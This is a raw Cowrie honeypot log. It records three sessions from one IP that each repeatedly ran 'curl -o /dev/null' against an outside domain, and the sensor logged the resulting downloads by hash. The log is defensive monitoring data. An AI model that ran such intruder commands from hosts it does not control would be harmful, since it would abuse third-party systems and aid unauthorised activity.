{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.323425Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.324259Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.324662Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.343334Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.343986Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.350168Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.351882Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.354048Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.356773Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.357450Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.375014Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.375653Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.380933Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.382871Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.384054Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.384847Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.415391Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.415968Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.417466Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.417905Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.420657Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.421295Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.424974Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.426208Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.454312Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.454985Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.459296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.464007Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.478970Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.480203Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.480772Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.484884Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.485563Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.490228Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.493002Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.493448Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.518350Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.519031Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.522958Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.524185Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.524839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.529147Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.530199Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.556646Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.557736Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.558335Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.562244Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.563458Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.564139Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.567048Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.569059Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.569694Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.596874Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.597553Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.602132Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.603226Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.605840Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.607945Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.609920Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.627522Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.628140Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.633053Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.636425Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.636984Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.639775Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.641296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.643132Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.644065Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.669531Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.670204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.674802Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.676180Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.676821Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.680656Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.683028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.703413Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.704155Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.708309Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.709896Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
